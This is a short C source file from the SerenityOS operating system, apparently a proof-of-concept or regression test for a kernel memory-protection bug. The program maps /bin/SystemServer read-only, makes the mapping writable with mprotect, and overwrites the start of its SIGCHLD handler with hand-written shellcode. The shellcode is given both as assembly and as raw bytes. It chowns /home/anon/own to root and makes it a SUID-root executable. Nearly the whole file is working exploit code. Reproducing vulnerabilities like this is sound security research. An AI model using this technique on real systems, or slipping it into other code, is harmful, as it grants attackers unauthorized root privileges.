jcs.org
Serenity Operating System
1#include <AK/Types.h>
2#include <fcntl.h>
3#include <stdio.h>
4#include <string.h>
5#include <sys/mman.h>
6#include <unistd.h>
7
8int main()
9{
10 int fd = open("/bin/SystemServer", O_RDONLY);
11 if (fd < 0) {
12 perror("open");
13 return 1;
14 }
15 u8* ptr = (u8*)mmap(nullptr, 16384, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);
16 if (ptr == MAP_FAILED) {
17 perror("mmap");
18 return 1;
19 }
20
21 if (mprotect(ptr, 16384, PROT_READ | PROT_WRITE) < 0) {
22 perror("mprotect");
23 return 1;
24 }
25
26 /*
27 *
28 * This payload replaces the start of sigchld_handler in the /bin/SystemServer file.
29 * It does two things:
30 *
31 * chown ("/home/anon/own", 0, 0);
32 * chmod ("/home/anon/own", 04755);
33 *
34 * In other words, it turns "/home/anon/own" into a SUID-root executable! :^)
35 *
36 */
37
38#if 0
39 [bits 32]
40 [org 0x0804b111]
41 jmp $+17
42 path:
43 db "/home/anon/own", 0
44 mov eax, 79
45 mov edx, path
46 mov ecx, 0
47 mov ebx, 0
48 int 0x82
49 mov eax, 67
50 mov edx, path
51 mov ecx, 15
52 mov ebx, 2541
53 int 0x82
54 ret
55#endif
56
57 const u8 payload[] = {
58 0xeb, 0x0f, 0x2f, 0x68, 0x6f, 0x6d, 0x65, 0x2f, 0x61, 0x6e, 0x6f,
59 0x6e, 0x2f, 0x6f, 0x77, 0x6e, 0x00, 0xb8, 0x4f, 0x00, 0x00, 0x00,
60 0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xbb,
61 0x00, 0x00, 0x00, 0x00, 0xcd, 0x82, 0xb8, 0x43, 0x00, 0x00, 0x00,
62 0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x0f, 0x00, 0x00, 0x00, 0xbb,
63 0xed, 0x09, 0x00, 0x00, 0xcd, 0x82, 0xc3
64 };
65
66 memcpy(&ptr[0x3111], payload, sizeof(payload));
67
68 printf("ok\n");
69 return 0;
70}